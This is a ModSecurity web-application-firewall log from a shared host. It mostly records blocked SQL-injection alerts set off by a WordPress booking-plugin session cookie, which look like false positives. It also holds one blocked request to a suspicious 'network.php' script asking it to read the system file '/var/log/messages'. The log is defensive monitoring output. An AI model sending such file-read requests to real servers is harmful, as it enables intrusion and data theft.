[Mon May 11 18:30:07.978261 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEDzJnyuKVXoStDhbhgQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:07.978563 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEDzJnyuKVXoStDhbhgQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:08.582837 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEDzJnyuKVXoStDhbhgQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:08.965189 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEEDJnyuKVXoStDhbhhAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:08.965487 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEEDJnyuKVXoStDhbhhAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:09.571853 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEEDJnyuKVXoStDhbhhAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:09.832593 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEETJnyuKVXoStDhbhhQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:09.832846 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEETJnyuKVXoStDhbhhQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:10.180469 2026] [security2:error] [pid 1412074:tid 1412096] [client 216.73.216.110:39417] ModSecurity: Warning. Matched phrase "var/log/messages" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/messages found within ARGS:filesrc: /var/log/messages-20260419"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIEEjJnyuKVXoStDhbhhgAAAFQ"]
[Mon May 11 18:30:10.181486 2026] [security2:error] [pid 1412074:tid 1412096] [client 216.73.216.110:39417] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIEEjJnyuKVXoStDhbhhgAAAFQ"]
[Mon May 11 18:30:10.276037 2026] [security2:error] [pid 1412074:tid 1412096] [client 216.73.216.110:39417] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIEEjJnyuKVXoStDhbhhgAAAFQ"]
[Mon May 11 18:30:10.433740 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEETJnyuKVXoStDhbhhQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:10.719977 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEEjJnyuKVXoStDhbhhwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:10.720271 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEEjJnyuKVXoStDhbhhwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:11.270134 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEEjJnyuKVXoStDhbhhwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:11.359672 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEEzJnyuKVXoStDhbhiAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:11.359960 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEEzJnyuKVXoStDhbhiAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:11.907092 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEEzJnyuKVXoStDhbhiAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:12.018675 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEFDJnyuKVXoStDhbhigAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:12.018951 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEFDJnyuKVXoStDhbhigAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:12.384149 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEFDJnyuKVXoStDhbhigAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:12.697981 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEFDJnyuKVXoStDhbhjAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:12.698289 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEFDJnyuKVXoStDhbhjAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:13.297217 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEFDJnyuKVXoStDhbhjAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:14.012076 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEFg-Qm4vhlWBPlMjlUQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:14.012546 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEFg-Qm4vhlWBPlMjlUQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:14.642694 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEFg-Qm4vhlWBPlMjlUQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:14.987335 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEFg-Qm4vhlWBPlMjlUgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:14.987620 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEFg-Qm4vhlWBPlMjlUgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:15.617766 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEFg-Qm4vhlWBPlMjlUgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:15.903903 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEFw-Qm4vhlWBPlMjlVAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:15.904215 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEFw-Qm4vhlWBPlMjlVAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:16.476978 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEFw-Qm4vhlWBPlMjlVAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:16.594017 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEGA-Qm4vhlWBPlMjlVQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:16.594314 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEGA-Qm4vhlWBPlMjlVQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:17.186413 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEGA-Qm4vhlWBPlMjlVQAAAAM"], referer: https://rentparadise.fr/wp-login.php
